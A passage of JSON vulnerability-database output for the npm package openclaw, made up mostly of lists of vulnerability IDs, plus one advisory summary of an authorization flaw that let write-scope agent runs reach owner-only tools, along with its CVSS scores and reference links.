eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtjv-j6yj-93et"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qahm-7zt5-fqcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wfsp-szhr-r7eu"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zda4-uuw4-fkhp"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"},{"vulnerability":"VCID-zwzb-t4a7-tff8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.1"}],"aliases":["GHSA-8m9v-xpgf-g99m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h6ka-w3qr-yuhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50482?format=json","vulnerability_id":"VCID-nxnv-bqua-gkcb","summary":"OpenClaw's authorization mismatch allowed write-scope agent runs to reach owner-only tools\nAn authorization mismatch allowed authenticated callers with `operator.write` access to invoke owner-only tool surfaces (`gateway`, `cron`) through `agent` runs in scoped-token deployments.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/advisories/GHSA-jr6x-2q95-fh2g","reference_id":"GHSA-jr6x-2q95-fh2g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr6x-2q95-fh2g"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jr6x-2q95-fh2g","reference_id":"GHSA-jr6x-2q95-fh2g","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jr6x-2q95-fh2g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74372?format=json","purl":"pkg:npm/openclaw@2026.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-34hg-6fw2-wfax"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-49b4-qwz6-q7he"},{"vulnerability":"VCID-4hcw-cv74-zkah"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7pqs-17nm-duf1"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8u6d-ekbs-afgd"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-dzmz-c5en-5qeq"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e31s-2etq-6fdq"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fjfw-xwxw-u3at"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h3yu-7bfc-vqhz"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulne